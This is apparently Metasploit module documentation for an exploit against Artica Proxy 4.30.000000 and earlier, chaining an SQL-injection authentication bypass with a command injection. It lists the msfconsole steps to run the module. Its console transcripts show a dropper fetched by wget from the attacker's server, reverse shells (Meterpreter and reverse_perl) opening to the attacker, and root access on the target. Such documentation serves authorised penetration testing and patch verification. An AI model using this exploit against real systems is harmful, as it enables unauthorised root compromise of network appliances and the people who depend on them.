## Vulnerable Application

### Introduction

This module exploits two vulnerabilities on Artica Proxy (version 4.30.000000 and lower),
an authentication bypass and an authenticated remote code execution, the authentication bypass
is due to an SQL injection vulnerability present in fw.login.php.

Because the application runs in virtual appliance, successful exploitation yields code execution
as root on the target system.

## Verification Steps

1. Start `msfconsole`
2. Do: `use exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection`
3. Do: `set RHOSTS [RHOSTS]`
4. Do: `check`
5. Verify if `check` detects vulnerable hosts as it should
6. Do: `exploit`
7. Verify if the payload was successfully executed on the target (that you get a session)

## Options

### PHPSESSID

The session cookie, if you have one.
If not set, the module will attempt to bypass authentication using the authentication bypass vulnerability.

## Scenarios

### Artica Proxy 4.26, 4.30.000000

#### Using a dropper / getting a native meterpreter shell (TARGET being Linux Dropper)

```
msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > exploit 

[*] Started reverse TCP handler on 192.168.1.222:4444 
[*] Attempting to bypass authentication via CVE-2020-17506 (SQL injection)
[+] Session cookie : 9a171f6964f8b35f53abf652d2b28748
[*] Using URL: http://0.0.0.0:8080/f0Y1VFKK4nAW
[*] Local IP: http://192.168.1.222:8080/f0Y1VFKK4nAW
[*] Attempting to gain RCE via CVE-2020-17505
[*] Client 192.168.1.223 (Wget/1.20.1 (linux-gnu)) requested /f0Y1VFKK4nAW
[*] Sending payload to 192.168.1.223 (Wget/1.20.1 (linux-gnu))
[*] Meterpreter session 1 opened (192.168.1.222:4444 -> 192.168.1.223:48330) at 2020-08-30 16:45:58 +0200
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : www.red0xff.co
OS           : Debian 10.2 (Linux 4.19.0-6-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > shell
Process 2724 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
```

#### Cmd payload : `cmd/unix/reverse_perl`

```
msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > 
msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > exploit 

[*] Started reverse TCP handler on 192.168.1.222:4444 
[*] Attempting to bypass authentication via CVE-2020-17506 (SQL injection)
[+] Session cookie : 1049da6bfa8e6217072f810a9b62ff7b
[*] Attempting to gain RCE via CVE-2020-17505
[*] Command shell session 7 opened (192.168.1.222:4444 -> 192.168.1.223:48466) at 2020-08-30 16:50:15 +0200

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
```
